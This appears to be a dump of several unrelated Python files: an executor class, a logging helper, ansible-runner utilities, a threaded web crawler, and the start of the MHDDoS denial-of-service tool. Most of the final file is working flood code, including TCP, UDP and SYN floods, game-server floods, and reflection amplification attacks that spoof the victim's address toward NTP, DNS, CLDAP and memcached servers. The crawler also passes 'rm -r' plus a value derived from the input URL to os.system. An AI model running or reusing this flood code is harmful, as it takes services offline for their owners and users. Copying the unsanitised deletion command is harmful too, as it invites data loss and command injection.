DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage(
"Message received is neither result nor exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def submit(self, func, *args, **kwargs):
""" TODO: docstring """
self._task_counter += 1
task_id = self._task_counter
logger.debug(
"Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
        # Post task to the outgoing queue
self.outgoing_q.put(task_id, fn_buf)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by the number of blocks specified.
Parameters
----------
blocks : int
# of blocks to scale out. Default=1
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
block = self.provider.submit(
self.launch_cmd, 1, self.workers_per_node)
logger.debug("Launched block {}:{}".format(i, block))
if not block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
self.blocks.extend([block])
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Raises:
NotImplementedError
"""
to_kill = self.blocks[:blocks]
if self.provider:
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = []
if self.provider:
status = self.provider.status(self.blocks)
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.warning("Attempting LowLatencyExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.warning("Finished LowLatencyExecutor shutdown attempt")
return True
|
Tools.py
|
import time
from threading import Thread
class Tools(object):
def __init__(self, api) :
self.__api = api
def WaitForReady(self) :
while True:
time.sleep(5)
if (self.__api.GetOperationMode() == 0) :
print("Ready")
break
def StartLogging(self) :
t = Thread(target=self._Log, args=())
t.start()
    def _Log(self) :
        # _LogMessages() loops forever, so run the error/warning logger in its own thread
        Thread(target=self._LogErrorsAndWarnings, args=()).start()
        self._LogMessages()
def _LogMessages(self) :
while (True) :
while (self.__api.HasMessage()) :
message = self.__api.GetMessage()
if(len(message)) == 3 :
print(message[0] + " " + message[1] + " " + message[2])
else :
print("??? wrong message format ???")
time.sleep(0.1)
def _LogErrorsAndWarnings(self) :
while (True) :
if (self.__api.HasErrors()) :
errors = self.__api.GetErrors()
for error in errors :
print("Error: " + error)
if (self.__api.HasWarnings()) :
warnings = self.__api.GetWarnings()
for warning in warnings :
print("Warning: " + warning)
time.sleep(10)
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
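# Minimal usage sketch for Bunch (illustrative only):
#   b = Bunch(status='ok', rc=0)
#   b.status         # -> 'ok'
#   b.get('rc')      # -> 0
#   b.update(rc=1)   # attributes can be added or changed later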
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
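# Illustrative results for the two checks above (not part of the original module):
#   isplaybook([{'hosts': 'all'}])       # -> True  (a list of plays)
#   isplaybook('site.yml')               # -> False (strings are not playbooks)
#   isinventory({'all': {'hosts': {}}})  # -> True  (dict-style inventory)
#   isinventory('/etc/ansible/hosts')    # -> True  (path/string inventory)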
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
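# Illustrative call for dump_artifact() (the path below is hypothetical): this writes
# the JSON string to /tmp/private_data/project/main.json unless an identical copy is
# already there, and returns the full path of the file that was written.
#   dump_artifact(json.dumps(play), '/tmp/private_data/project', 'main.json')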
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
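# Example of the substitution above (illustrative): every character outside
# [a-zA-Z0-9_-] becomes an underscore.
#   sanitize_container_name('ansible runner:job#42')  # -> 'ansible_runner_job_42'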
|
main.py
|
from crawl_bot import Crawl_bot
from file_manage import *
from queue import Queue
import threading, sys, os
from get_domains import *
import tldextract
def input_url(base_url):
global BASE_URL, regex
BASE_URL=base_url
url_extract = tldextract.extract(BASE_URL)
regex = url_extract.domain
delete = str('rm -r ' + regex)
os.system(delete)
if __name__=='__main__':
if (len(sys.argv) == 2):
input_url(sys.argv[1])
    else:
        print("Invalid input")
        sys.exit(1)
GET_DOMAIN = get_domain_name(BASE_URL)
FOLDER_NAME = 'hacking/' + regex
data_crawled = FOLDER_NAME + '/crawled.txt'
data_in_queue = FOLDER_NAME + '/queue.txt'
thread_count = 50
queue = Queue()
Crawl_bot(FOLDER_NAME, BASE_URL, GET_DOMAIN)
def do_job(): # Get the job done
while True:
url = queue.get()
Crawl_bot.crawl_page(threading.current_thread().name, url)
queue.task_done()
def queue_jobs(): # Define each queued link as a new job
for url_link in convert_to_set(data_in_queue):
queue.put(url_link)
queue.join()
initiate_bot()
def get_links_to_queue(): # Also used to create threads to work
for _ in range(thread_count):
thread = threading.Thread(target=do_job)
thread.daemon = True
thread.start()
def initiate_bot(): # Does the crawling job
links_in_queue = convert_to_set(data_in_queue)
if len(links_in_queue) > 0:
print(str(len(links_in_queue)) + ' queued links')
queue_jobs()
get_links_to_queue()
initiate_bot()
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return str(ProxyTools.Tools.rand_char(lengh)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(60)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
